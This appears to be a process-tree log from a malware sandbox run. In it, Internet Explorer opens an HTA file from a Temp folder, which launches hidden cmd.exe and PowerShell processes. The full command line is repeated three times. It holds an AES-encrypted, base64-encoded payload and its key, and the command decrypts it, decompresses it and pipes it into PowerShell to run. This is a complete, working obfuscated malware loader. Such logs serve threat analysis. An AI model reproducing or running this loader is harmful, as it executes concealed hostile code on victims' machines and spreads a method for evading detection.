iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\lano2.hta.html
3068powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $nlQd = 'AAAAAAAAAAAAAAAAAAAAAGm0cNyZxntPzH+fHRaTsGlOraX9OxIqcsTFdZZUxRcwysN9fZSDRrN7DRqCFEHkyulz/euXrYWwzmO6eHParfoDFynIw/NFhJvI1ajFWodLyGFQT0F/gKY2skZTtHhGSReVPxYjtg78gJCIFVL7VA9IdW+KNAga+GGhp7jEUaadq2bMi35xDH8k4pn86BTaBDL2gGovJt0gLjGLVkf3GxHDwjALOMePrQDa0/YTk5cDTu3BBErcQr8wRTaM8Dq63x4aiB1g1haVwpf+CXyfD0TFhAwYhASAua55RDVlpPZoi4nKRpVvz/KVXSAKbuaIGqlD58qpEmrfx4TzJdisuCIVSndz2n7X9faWK1CHZuz30Fam2DwcMvlY6g0npl289Jbjm975COQ3U71HgSOj1YUQyM8lecgMJT/VWls+i/JlVao7vO1he6AqqqJlbsnJygBKEu7ZLASEwN0d97IWS162GiIInolCwd5sp+XnLfi7CJajnOtGu9V76G6hiM/mIjjE/YLcsfR77XCifLEwKaxWTcSo3HrWr9YGImigIIYxPJkiEcr0dT+6HeTpgGCepEB/e63fOyKlnhrPayC630bkBmsTKoLXHt0gA68RkfJVuIy754nTtcvnA+MpPGl2cEADD4+1FigZQXpf5AwTzFSzxR+da9KPJ1Gr7ugf/mr8QfdRWUdKjFapscAah7BHasBhMUnH4ew3RKEdEsN0ENEao0cw+saTsPjHxsx/iLiWxkjw/rxMeKYtJKu3n13SybTtmc4mv19peMacRwzjPYI9a4K4T5r9A0qfegAjttRtduRi4cgASIQX7odwvGeB7k6qqPtqiVzyAXDTIKNeJoGjRegyJ+inJfDkO4C129DkoxQ9nTQNp707DdTX1gxNTHMY8HJaAQCd2wOrHpYnkpPNxXEY9J4yVAvwlQErttwhgEjedOQTSTJ567ButIm7M7Khpp6IcTx+BGygui1xu2k=';$tWpQVby = 'bUhSRUhLS3B0RHNKcmhSYnhGblJOS2tkUU5ia1Z6TWo=';$HSihsk = New-Object 'System.Security.Cryptography.AesManaged';$HSihsk.Mode = [System.Security.Cryptography.CipherMode]::ECB;$HSihsk.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$HSihsk.BlockSize = 128;$HSihsk.KeySize = 256;$HSihsk.Key = [System.Convert]::FromBase64String($tWpQVby);$Omqpr = [System.Convert]::FromBase64String($nlQd);$SHDzOWza = $Omqpr[0..15];$HSihsk.IV = $SHDzOWza;$wFNIXQHKM = $HSihsk.CreateDecryptor();$CZbDtTJuK = $wFNIXQHKM.TransformFinalBlock($Omqpr, 16, $Omqpr.Length - 16);$HSihsk.Dispose();$ilrYPQCw = New-Object System.IO.MemoryStream( , $CZbDtTJuK );$RcHyK = New-Object System.IO.MemoryStream;$dedlfDddT = New-Object System.IO.Compression.GzipStream $ilrYPQCw, ([IO.Compression.CompressionMode]::Decompress);$dedlfDddT.CopyTo( $RcHyK );$dedlfDddT.Close();$ilrYPQCw.Close();[byte[]] $rxGgI = $RcHyK.ToArray();$RgZotFEs = [System.Text.Encoding]::UTF8.GetString($rxGgI);$RgZotFEs | powershell - }
1728cmd.exe "C:\Windows\system32\cmd.exe" /c powershell.exe $nlQd = 'AAAAAAAAAAAAAAAAAAAAAGm0cNyZxntPzH+fHRaTsGlOraX9OxIqcsTFdZZUxRcwysN9fZSDRrN7DRqCFEHkyulz/euXrYWwzmO6eHParfoDFynIw/NFhJvI1ajFWodLyGFQT0F/gKY2skZTtHhGSReVPxYjtg78gJCIFVL7VA9IdW+KNAga+GGhp7jEUaadq2bMi35xDH8k4pn86BTaBDL2gGovJt0gLjGLVkf3GxHDwjALOMePrQDa0/YTk5cDTu3BBErcQr8wRTaM8Dq63x4aiB1g1haVwpf+CXyfD0TFhAwYhASAua55RDVlpPZoi4nKRpVvz/KVXSAKbuaIGqlD58qpEmrfx4TzJdisuCIVSndz2n7X9faWK1CHZuz30Fam2DwcMvlY6g0npl289Jbjm975COQ3U71HgSOj1YUQyM8lecgMJT/VWls+i/JlVao7vO1he6AqqqJlbsnJygBKEu7ZLASEwN0d97IWS162GiIInolCwd5sp+XnLfi7CJajnOtGu9V76G6hiM/mIjjE/YLcsfR77XCifLEwKaxWTcSo3HrWr9YGImigIIYxPJkiEcr0dT+6HeTpgGCepEB/e63fOyKlnhrPayC630bkBmsTKoLXHt0gA68RkfJVuIy754nTtcvnA+MpPGl2cEADD4+1FigZQXpf5AwTzFSzxR+da9KPJ1Gr7ugf/mr8QfdRWUdKjFapscAah7BHasBhMUnH4ew3RKEdEsN0ENEao0cw+saTsPjHxsx/iLiWxkjw/rxMeKYtJKu3n13SybTtmc4mv19peMacRwzjPYI9a4K4T5r9A0qfegAjttRtduRi4cgASIQX7odwvGeB7k6qqPtqiVzyAXDTIKNeJoGjRegyJ+inJfDkO4C129DkoxQ9nTQNp707DdTX1gxNTHMY8HJaAQCd2wOrHpYnkpPNxXEY9J4yVAvwlQErttwhgEjedOQTSTJ567ButIm7M7Khpp6IcTx+BGygui1xu2k=';$tWpQVby = 'bUhSRUhLS3B0RHNKcmhSYnhGblJOS2tkUU5ia1Z6TWo=';$HSihsk = New-Object 'System.Security.Cryptography.AesManaged';$HSihsk.Mode = [System.Security.Cryptography.CipherMode]::ECB;$HSihsk.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$HSihsk.BlockSize = 128;$HSihsk.KeySize = 256;$HSihsk.Key = [System.Convert]::FromBase64String($tWpQVby);$Omqpr = [System.Convert]::FromBase64String($nlQd);$SHDzOWza = $Omqpr[0..15];$HSihsk.IV = $SHDzOWza;$wFNIXQHKM = $HSihsk.CreateDecryptor();$CZbDtTJuK = $wFNIXQHKM.TransformFinalBlock($Omqpr, 16, $Omqpr.Length - 16);$HSihsk.Dispose();$ilrYPQCw = New-Object System.IO.MemoryStream( , $CZbDtTJuK );$RcHyK = New-Object System.IO.MemoryStream;$dedlfDddT = New-Object System.IO.Compression.GzipStream $ilrYPQCw, ([IO.Compression.CompressionMode]::Decompress);$dedlfDddT.CopyTo( $RcHyK );$dedlfDddT.Close();$ilrYPQCw.Close();[byte[]] $rxGgI = $RcHyK.ToArray();$RgZotFEs = [System.Text.Encoding]::UTF8.GetString($rxGgI);$RgZotFEs | powershell -
260powershell.exe powershell.exe $nlQd = 'AAAAAAAAAAAAAAAAAAAAAGm0cNyZxntPzH+fHRaTsGlOraX9OxIqcsTFdZZUxRcwysN9fZSDRrN7DRqCFEHkyulz/euXrYWwzmO6eHParfoDFynIw/NFhJvI1ajFWodLyGFQT0F/gKY2skZTtHhGSReVPxYjtg78gJCIFVL7VA9IdW+KNAga+GGhp7jEUaadq2bMi35xDH8k4pn86BTaBDL2gGovJt0gLjGLVkf3GxHDwjALOMePrQDa0/YTk5cDTu3BBErcQr8wRTaM8Dq63x4aiB1g1haVwpf+CXyfD0TFhAwYhASAua55RDVlpPZoi4nKRpVvz/KVXSAKbuaIGqlD58qpEmrfx4TzJdisuCIVSndz2n7X9faWK1CHZuz30Fam2DwcMvlY6g0npl289Jbjm975COQ3U71HgSOj1YUQyM8lecgMJT/VWls+i/JlVao7vO1he6AqqqJlbsnJygBKEu7ZLASEwN0d97IWS162GiIInolCwd5sp+XnLfi7CJajnOtGu9V76G6hiM/mIjjE/YLcsfR77XCifLEwKaxWTcSo3HrWr9YGImigIIYxPJkiEcr0dT+6HeTpgGCepEB/e63fOyKlnhrPayC630bkBmsTKoLXHt0gA68RkfJVuIy754nTtcvnA+MpPGl2cEADD4+1FigZQXpf5AwTzFSzxR+da9KPJ1Gr7ugf/mr8QfdRWUdKjFapscAah7BHasBhMUnH4ew3RKEdEsN0ENEao0cw+saTsPjHxsx/iLiWxkjw/rxMeKYtJKu3n13SybTtmc4mv19peMacRwzjPYI9a4K4T5r9A0qfegAjttRtduRi4cgASIQX7odwvGeB7k6qqPtqiVzyAXDTIKNeJoGjRegyJ+inJfDkO4C129DkoxQ9nTQNp707DdTX1gxNTHMY8HJaAQCd2wOrHpYnkpPNxXEY9J4yVAvwlQErttwhgEjedOQTSTJ567ButIm7M7Khpp6IcTx+BGygui1xu2k=';$tWpQVby = 'bUhSRUhLS3B0RHNKcmhSYnhGblJOS2tkUU5ia1Z6TWo=';$HSihsk = New-Object 'System.Security.Cryptography.AesManaged';$HSihsk.Mode = [System.Security.Cryptography.CipherMode]::ECB;$HSihsk.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$HSihsk.BlockSize = 128;$HSihsk.KeySize = 256;$HSihsk.Key = [System.Convert]::FromBase64String($tWpQVby);$Omqpr = [System.Convert]::FromBase64String($nlQd);$SHDzOWza = $Omqpr[0..15];$HSihsk.IV = $SHDzOWza;$wFNIXQHKM = $HSihsk.CreateDecryptor();$CZbDtTJuK = $wFNIXQHKM.TransformFinalBlock($Omqpr, 16, $Omqpr.Length - 16);$HSihsk.Dispose();$ilrYPQCw = New-Object System.IO.MemoryStream( , $CZbDtTJuK );$RcHyK = New-Object System.IO.MemoryStream;$dedlfDddT = New-Object System.IO.Compression.GzipStream $ilrYPQCw, ([IO.Compression.CompressionMode]::Decompress);$dedlfDddT.CopyTo( $RcHyK );$dedlfDddT.Close();$ilrYPQCw.Close();[byte[]] $rxGgI = $RcHyK.ToArray();$RgZotFEs = [System.Text.Encoding]::UTF8.GetString($rxGgI);$RgZotFEs
2992powershell.exe powershell -
3044